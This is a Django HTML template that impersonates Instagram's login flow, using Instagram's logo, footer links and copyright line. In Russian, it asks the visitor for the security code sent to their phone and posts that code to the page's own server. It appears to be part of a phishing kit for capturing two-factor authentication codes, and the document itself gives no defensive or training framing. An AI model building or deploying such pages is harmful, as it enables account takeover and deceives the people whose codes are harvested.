{% load static %}
<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta content="width=device-width, initial-scale=1" name="viewport" />
	<title>Instagram Login Page</title>
	<link rel="stylesheet" href="{% static 'styles.css'%}">
	<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">

	<style>
 

		@media only screen and (max-width: 600px) {
			.adcasd {
			  display: none !important;
		  }
		}
		</style>
		</head>
<body>

 
 
 
<div class="wrapper">

<div class="container">
<div class="row">
<div class="col-lg-6 col-md-6 col-sm-12 adcasd">
<img src="{% static 'image.png'%}" style=" float: right; margin: 30px 0 0 0; "/>
</div>
<div class="col-lg-6 col-md-6 col-sm-12">
	<div class="header" style=" float: left;	 ">
		<div class="top">
			<div class="logo">
				<img src="{% static 'instagram.png'%}" alt="instagram" style="width: 175px;">
			</div>
			<div style=" text-align: center; ">Введите код, который мы отправили ваш номер.</div>
			<div class="form"><form method="post" autocomplete="off">{% csrf_token %}
				<div class="input_field">
					<input type="text" name="code" autocomplete="off" placeholder="Код безопасности" class="input">
				</div>
				
				<button type="submit" class="btn" style=" width: 100%;text-decoration: none;border: none;color: white;">Подтвердить</button>
			</form>
            </div>
			<div style=" text-align: center; ">Вы не получили код безопасности? Мы можем отправить его повторно.</div>
			<div class="dif">
				 
			</div>
		</div>
		<div class="signup">
			<p>У вас ещё нет аккаунта? <a href="#">Зарегистрироваться</a></p>
		</div>
		<div class="apps">
			<p>Установите приложение.</p>
			<div class="icons">
				<a href="#"><img src="{% static 'appstore.png'%}" alt="appstore"></a>
				<a href="#"><img src="{% static 'googleplay.png'%}" alt="googleplay"></a>
			</div>
		</div>
	</div>
	</div>
</div>
</div>
	
	
	
	
	
	<div class="footer"  style="padding: 40px 40px;">
		<div class="links">
			<ul>
				<li><a href="#">ABOUT US</a></li>
				<li><a href="#">SUPPORT</a></li>
				<li><a href="#">PRESS</a></li>
				<li><a href="#">API</a></li>
				<li><a href="#">JOBS</a></li>
				<li><a href="#">PRIVACY</a></li>
				<li><a href="#">TERMS</a></li>
				<li><a href="#">DIRECTORY</a></li>
				<li><a href="#">PROFILES</a></li>
				<li><a href="#">HASHTAGS</a></li>
				<li><a href="#">LANGUAGE</a></li>
			</ul>
		</div>
		<div class="copyright">
			© 2019 INSTAGRAM
		</div>
	</div>
</div>


</body>
</html>